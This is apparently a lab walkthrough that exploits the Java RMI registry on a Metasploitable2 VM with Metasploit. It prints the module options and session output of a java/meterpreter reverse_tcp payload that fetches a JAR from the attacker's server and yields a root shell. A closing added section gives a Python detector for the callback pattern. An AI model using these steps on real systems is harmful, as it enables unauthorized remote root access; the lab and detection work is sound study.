October 19, 2021
metasploitable2 exploit

What Is the Java RMI Registry Exploit?


Java_rmi

Java RMI (Remote Method Invocation) allows a Java object running on one machine to call a method of another Java object running on a different machine. In an nmap scan, the service can be seen running on port 1099.

1099/tcp open  java-rmi         Java RMI Registry

msf6 > search java rmi

Matching Modules
================

#   Name                                                  Disclosure Date  Rank       Check  Description
-   ----                                                  ---------------  ----       -----  -----------
0   exploit/multi/misc/java_jmx_server                    2013-05-22       excellent  Yes    Java JMX Server Insecure Configuration Java Code Execution
1   auxiliary/scanner/misc/java_jmx_server                2013-05-22       normal     No     Java JMX Server Insecure Endpoint Code Execution Scanner
2   auxiliary/gather/java_rmi_registry                                     normal     No     Java RMI Registry Interfaces Enumeration
3   exploit/multi/misc/java_rmi_server                    2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
4   auxiliary/scanner/misc/java_rmi_server                2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
5   exploit/multi/browser/java_rmi_connection_impl        2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
6   exploit/multi/browser/java_signed_applet              1997-02-19       excellent  No     Java Signed Applet Social Engineering Code Execution
7   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
8   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
9   exploit/multi/browser/firefox_xpi_bootstrapped_addon  2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
10  exploit/multi/http/totaljs_cms_widget_exec            2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection


Interact with a module by name or index. For example info 10, use 10 or use exploit/multi/http/totaljs_cms_widget_exec

msf6 > use 3
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT      1099             yes       The target port (TCP)
SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT    8080             yes       The local port to listen on.
SSL        false            no        Negotiate SSL for incoming connections
SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.138.128  yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) > set rhost 192.168.138.129
rhost => 192.168.138.129
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.138.128:4444
[*] 192.168.138.129:1099 - Using URL: http://0.0.0.0:8080/6kEum7A3
[*] 192.168.138.129:1099 - Local IP: http://192.168.138.128:8080/6kEum7A3
[*] 192.168.138.129:1099 - Server started.
[*] 192.168.138.129:1099 - Sending RMI Header...
[*] 192.168.138.129:1099 - Sending RMI Call...
[*] 192.168.138.129:1099 - Replied to request for payload JAR
[*] Sending stage (58082 bytes) to 192.168.138.129
[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:44124) at 2021-05-29 15:22:37 +0300
[*] 192.168.138.129:1099 - Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Access to the system has been obtained with root privileges.
If you wish, you can take a look at the Meterpreter commands.
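
The session output above shows the RMI host answering a call on 1099/tcp by fetching a payload JAR from the calling host's HTTP server and then opening a reverse TCP connection to it. From the defender's side, that pattern can be flagged by correlating flow records. The following is an added example, not part of the original post; the flow records, the 192.168.138.50 client, the 30-second window and the function name are assumptions constructed for illustration.

```python
from collections import namedtuple

# Constructed flow records (not captured traffic), modelled on the session above:
# a peer reaches 1099/tcp, then the RMI host connects back to that same peer.
Flow = namedtuple("Flow", "ts src sport dst dport")
SAMPLE_FLOWS = [
    Flow(0.0, "192.168.138.50", 51000, "192.168.138.129", 1099),    # ordinary RMI client
    Flow(10.0, "192.168.138.128", 40112, "192.168.138.129", 1099),  # RMI call
    Flow(10.4, "192.168.138.129", 39876, "192.168.138.128", 8080),  # JAR fetch over HTTP
    Flow(11.1, "192.168.138.129", 44124, "192.168.138.128", 4444),  # reverse TCP session
    Flow(95.0, "192.168.138.129", 40001, "192.168.138.50", 8080),   # outside the window
]

RMI_PORT = 1099
WINDOW = 30.0  # seconds; assumed tuning value


def find_rmi_callbacks(flows, rmi_port=RMI_PORT, window=WINDOW, allow=frozenset()):
    """Return alerts where a host that just received an RMI registry connection
    opens a new connection back to the same peer within `window` seconds.

    Legitimate RMI callbacks can match as well, so known client addresses
    can be passed in `allow` to suppress them.
    """
    alerts = []
    inbound = {}  # (rmi_host, peer) -> time of the latest inbound RMI connection
    for f in sorted(flows, key=lambda f: f.ts):
        if f.dport == rmi_port:
            inbound[(f.dst, f.src)] = f.ts
            continue
        seen = inbound.get((f.src, f.dst))
        if seen is not None and f.ts - seen <= window and f.dst not in allow:
            alerts.append({"server": f.src, "peer": f.dst,
                           "callback_port": f.dport,
                           "delay": round(f.ts - seen, 2)})
    return alerts


if __name__ == "__main__":
    for alert in find_rmi_callbacks(SAMPLE_FLOWS):
        print(alert)
```

On a host that has no reason to initiate connections to its RMI clients, any alert from this rule is worth investigating; blocking outbound traffic from the RMI host at the firewall removes both the JAR fetch and the reverse connection seen in the session.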
